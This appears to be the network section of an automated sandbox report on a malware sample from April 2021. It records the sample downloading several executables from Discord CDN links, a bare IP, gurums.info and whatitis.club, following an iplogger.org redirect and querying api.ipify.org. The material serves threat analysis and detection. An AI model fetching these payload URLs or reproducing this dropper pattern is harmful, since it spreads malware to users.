Network Analysis
IP Address | Status | Action |
---|---|---|
104.23.98.190 | Active | Moloch |
162.159.129.233 | Active | Moloch |
164.124.101.2 | Active | Moloch |
188.68.221.233 | Active | Moloch |
194.106.216.70 | Active | Moloch |
195.123.215.21 | Active | Moloch |
203.159.80.228 | Active | Moloch |
217.144.96.35 | Active | Moloch |
23.21.252.4 | Active | Moloch |
88.99.66.31 | Active | Moloch |
TCP Requests
Source | Destination | Host |
---|---|---|
192.168.56.101:49202 | 104.23.98.190:443 | pastebin.com |
192.168.56.101:49204 | 162.159.129.233:443 | cdn.discordapp.com |
192.168.56.101:49207 | 162.159.129.233:443 | cdn.discordapp.com |
188.68.221.233:80 | 192.168.56.101:49220 | |
188.68.221.233:80 | 192.168.56.101:49226 | |
192.168.56.101:49209 | 194.106.216.70:443 | fex.net |
192.168.56.101:49208 | 195.123.215.21:80 | whatitis.club |
192.168.56.101:49203 | 203.159.80.228:80 | |
192.168.56.101:49205 | 217.144.96.35:80 | gurums.info |
192.168.56.101:49206 | 217.144.96.35:80 | gurums.info |
192.168.56.101:49216 | 23.21.252.4:80 | api.ipify.org |
192.168.56.101:49210 | 88.99.66.31:443 | iplogger.org |
UDP Requests
Source | Destination |
---|---|
192.168.56.101:54056 | 164.124.101.2:53 |
192.168.56.101:55450 | 164.124.101.2:53 |
192.168.56.101:56977 | 164.124.101.2:53 |
192.168.56.101:59369 | 164.124.101.2:53 |
192.168.56.101:61479 | 164.124.101.2:53 |
192.168.56.101:62324 | 164.124.101.2:53 |
192.168.56.101:65329 | 164.124.101.2:53 |
192.168.56.101:137 | 192.168.56.255:137 |
192.168.56.101:138 | 192.168.56.255:138 |
192.168.56.101:49152 | 239.255.255.250:3702 |
192.168.56.101:62325 | 239.255.255.250:3702 |
192.168.56.101:62445 | 239.255.255.250:1900 |
192.168.56.101:62447 | 239.255.255.250:3702 |
192.168.56.101:62449 | 239.255.255.250:3702 |
52.231.114.183:123 | 192.168.56.101:123 |
8.8.8.8:53 | 192.168.56.101:56887 |
8.8.8.8:53 | 192.168.56.101:57460 |
8.8.8.8:53 | 192.168.56.101:65329 |
GET 200 https://pastebin.com/raw/VVpUeH0C

Request:
```http
GET /raw/VVpUeH0C HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
```
Response:
```http
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:28:00 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=db90641bb9dcf13375f4e86778fd5949b1617596879; expires=Wed, 05-May-21 04:27:59 GMT; path=/; domain=.pastebin.com; HttpOnly; SameSite=Lax; Secure
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: EXPIRED
cf-request-id: 0941e2a8960000e9d85aaf3000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 63b006edbbe1e9d8-ICN
```
GET 200 https://cdn.discordapp.com/attachments/826416818390040589/826540039764705360/7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe

Request:
```http
GET /attachments/826416818390040589/826540039764705360/7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
```
Response:
```http
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:28:07 GMT
Content-Type: application/x-msdos-program
Content-Length: 505856
Connection: keep-alive
Set-Cookie: __cfduid=d4cf7c7f9f3f4a06f260720fcc1a69fe51617596887; expires=Wed, 05-May-21 04:28:07 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63b00721dff8e9f0-ICN
Accept-Ranges: bytes
Age: 451896
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe
ETag: "28345a7bb63babaf99e760965ce493b7"
Expires: Tue, 05 Apr 2022 04:28:07 GMT
Last-Modified: Tue, 30 Mar 2021 19:35:01 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941e2c92b0000e9f0d0826000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1617132901889175
x-goog-hash: crc32c=Ws/4nQ==
x-goog-hash: md5=KDRae7Y7q6+Z52CWXOSTtw==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 505856
X-GUploader-UploadID: ABg5-UznZNO55X93AubXlWYP0c5SyYOTRHkzDJhcIzrcH58RoyWaPDs0j0jqBmhsS-QvB5VHDoqPplp1xtV5hwkr0kW8h3tVvw
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=TLpBLQmgFXy6H8BnagOTruJ4Vqn%2Fw1s7OqqBoB7OD7m1U1UJd6OtvH2fN8DlTMSTkNfboawWgKZ%2FZ4kGE3UsJaXlD3grdOUTcD438M6Xw69KdM0%3D"}],"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
```
GET 403 https://cdn.discordapp.com/attachments/826416818390040589/826855866228670474/7525b875715555.exe

Request:
```http
GET /attachments/826416818390040589/826855866228670474/7525b875715555.exe HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
```
Response:
```http
HTTP/1.1 403 Forbidden
Date: Mon, 05 Apr 2021 04:28:07 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=d8cd18283577c7710584319e7b75b91e71617596887; expires=Wed, 05-May-21 04:28:07 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63b007224cf53532-ICN
Cache-Control: private, max-age=0
Expires: Mon, 05 Apr 2021 04:28:07 GMT
Vary: Accept-Encoding
CF-Cache-Status: EXPIRED
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941e2c9700000353262a72000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-UweGdpxKnA0oqPmHGiWqUQGiYQ2LsTpPq-VEBeY-w_3LSy_yH34lxwniTQ5xKzeTn4eo_ZqhOJn5GN4rWbkzgAlx661mg
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=bXDXFYViyFNVmXz9pGWeIX47KIAvi4XwsoPkJGASviKHjes%2FmKPuFNxCBK008yfirjbXSQ0RXv2mfquDwbDT%2FRWnFZrAMLu08E7Punju2J5WpaQ%3D"}],"max_age":604800,"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
```
GET 200 https://fex.net/uk/s/o1ovzfe

Request:
```http
GET /uk/s/o1ovzfe HTTP/1.1
Host: fex.net
Connection: Keep-Alive
```
Response:
```http
HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Mon, 05 Apr 2021 04:28:30 GMT
Content-Type: text/html
Content-Length: 7520
Last-Modified: Sun, 28 Mar 2021 18:01:14 GMT
Connection: keep-alive
ETag: "6060c46a-1d60"
X-Robots-Tag: noindex, nofollow
Accept-Ranges: bytes
```
GET 301 https://iplogger.org/2LehR6.exe

Request:
```http
GET /2LehR6.exe HTTP/1.1
Host: iplogger.org
Connection: Keep-Alive
```
Response:
```http
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 05 Apr 2021 04:28:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=n7p8kbs39uk4m2k44b5fd0uju6; path=/; HttpOnly
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=261451281; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Location: https://cdn.discordapp.com/attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
```
GET 200 https://cdn.discordapp.com/attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe

Request:
```http
GET /attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe HTTP/1.1
Host: cdn.discordapp.com
```
Response:
```http
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:28:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d271a7de8974181c19a710d7b377f60621617596912; expires=Wed, 05-May-21 04:28:32 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
cf-request-id: 0941e32c040000e9f0b906c000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=3jE%2B2KjgpHzSd2dfj1Cw8QsLAIGLSY2sD08%2FQjzoUKQaOvRiXaOh3IVnFt8I6%2BvPcqJrCgiPWR96Css3VOJNkPYZZC9TT3K%2BwiP3FPLvayX%2Fjvw%3D"}],"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 63b007bffa8de9f0-ICN
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
```
GET 200 http://203.159.80.228/downloads/sfx_123_400.exe

Request:
```http
GET /downloads/sfx_123_400.exe HTTP/1.1
Host: 203.159.80.228
Connection: Keep-Alive
```
Response:
```http
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:28:06 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.2
Last-Modified: Fri, 02 Apr 2021 20:26:09 GMT
ETag: "112eee-5bf0328827a40"
Accept-Ranges: bytes
Content-Length: 1126126
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
```
GET 200 http://gurums.info/lukkeze.best.exe

Request:
```http
GET /lukkeze.best.exe HTTP/1.1
Host: gurums.info
Connection: Keep-Alive
```
Response:
```http
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Type: application/x-msdownload
Last-Modified: Wed, 10 Mar 2021 07:13:04 GMT
Etag: "4280e-60487180-eb142a97dab1e4c8;;;"
Accept-Ranges: bytes
Content-Length: 272398
Date: Mon, 05 Apr 2021 04:28:06 GMT
Server: LiteSpeed
```
GET 200 http://gurums.info/MMP2.exe

Request:
```http
GET /MMP2.exe HTTP/1.1
Host: gurums.info
Connection: Keep-Alive
```
Response:
```http
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Type: application/x-msdownload
Last-Modified: Mon, 05 Apr 2021 04:25:04 GMT
Etag: "4900e-606a9120-3dbe9eacf94eed7a;;;"
Accept-Ranges: bytes
Content-Length: 299022
Date: Mon, 05 Apr 2021 04:28:06 GMT
Server: LiteSpeed
```
GET 200 http://whatitis.club/load.php?pub=mixruzki

Request:
```http
GET /load.php?pub=mixruzki HTTP/1.1
Host: whatitis.club
Connection: Keep-Alive
```
Response:
```http
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Apr 2021 04:28:07 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.16
Content-Description: File Transfer
Content-Disposition: attachment; filename=setup.exe
Content-Transfer-Encoding: binary
```
GET 200 http://api.ipify.org/?format=xml

Request:
```http
GET /?format=xml HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
Host: api.ipify.org
Connection: Keep-Alive
```
Response:
```http
HTTP/1.1 200 OK
Server: Cowboy
Connection: keep-alive
Content-Type: text/plain
Vary: Origin
Date: Mon, 05 Apr 2021 04:28:45 GMT
Content-Length: 15
Via: 1.1 vegur
```
ICMP traffic
Source | Destination | ICMP Type | Data |
---|---|---|---|
192.168.56.101 | 164.124.101.2 | 3 | |
IRC traffic
No IRC requests performed.
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts